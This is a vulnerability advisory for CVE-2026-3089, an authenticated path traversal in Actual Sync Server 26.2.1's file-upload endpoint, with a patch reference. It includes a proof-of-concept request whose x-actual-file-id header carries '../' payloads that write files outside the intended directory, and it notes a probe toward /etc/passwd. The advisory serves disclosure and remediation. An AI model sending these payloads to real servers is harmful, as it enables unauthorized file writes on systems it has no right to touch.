Actual Sync Server 26.2.1 - Authenticated Path Traversal

Description

Actual Sync Server allows authenticated users to upload files through POST /sync/upload-user-file.
The server builds a filesystem path using user-controlled x-actual-file-id in:
join(resolve(config.get('userFiles')), 'file-${fileId}.blob').
Because fileId is not validated with a strict allowlist and there is no canonical boundary validation, traversal segments (../) can escape the intended directory and write files outside userFiles.

Vulnerability

The affected endpoint is POST /sync/upload-user-file, where user-controlled x-actual-file-id is used to construct filesystem paths without strict allowlist validation or canonical boundary enforcement, enabling traversal-based writes outside the intended directory. A secondary weakness exists in GET /sync/download-user-file, which relies on startsWith(resolve(config.get('userFiles'))) for path validation and can be bypassed with sibling-prefix paths such as /data/user-files2. The root cause is implemented in actual/packages/sync-server/src/util/paths.js and actual/packages/sync-server/src/app-sync.ts.

PoC

Request:
POST /sync/upload-user-file
Headers:

• x-actual-token: <valid token>

• x-actual-name: poc

• x-actual-file-id: ../../../server-files/pwned-traversal

• Content-Type: application/encrypted-file
  Body:

• poc-content

Observed result:

• /data/server-files/pwned-traversal.blob is created outside the intended user files directory.

Additional payload:

• x-actual-file-id: ../../../../tmp/outside-actual-data
  Observed result:

• /tmp/outside-actual-data.blob is created.

Evidence of Exploitation

Successful write with crafted header x-actual-file-id: ../../../server-files/pwned-traversal.

• File created at /data/server-files/pwned-traversal.blob.

• Successful write outside /data at /tmp/outside-actual-data.blob.

• Attempting direct read of /etc/passwd via this vector does not yield raw /etc/passwd; the resolved target becomes /etc/passwd.blob.

• File creation evidence

  

Our security policy

We have reserved the ID CVE-2026-3089 to refer to this issue from now on.

Disclosure policy

System Information

• Actual Sync Server

• Version: 26.2.1

• Operating System: Any

References

• Product: https://github.com/actualbudget/actual

• Security: https://github.com/actualbudget/actual/security

• Patch: https://github.com/actualbudget/actual/pull/7067

Mitigation

An updated version of Actual Sync Server is available at the vendor page.

Credits

The vulnerability was discovered by Juan Patarroyo from Fluid Attacks' Offensive Team.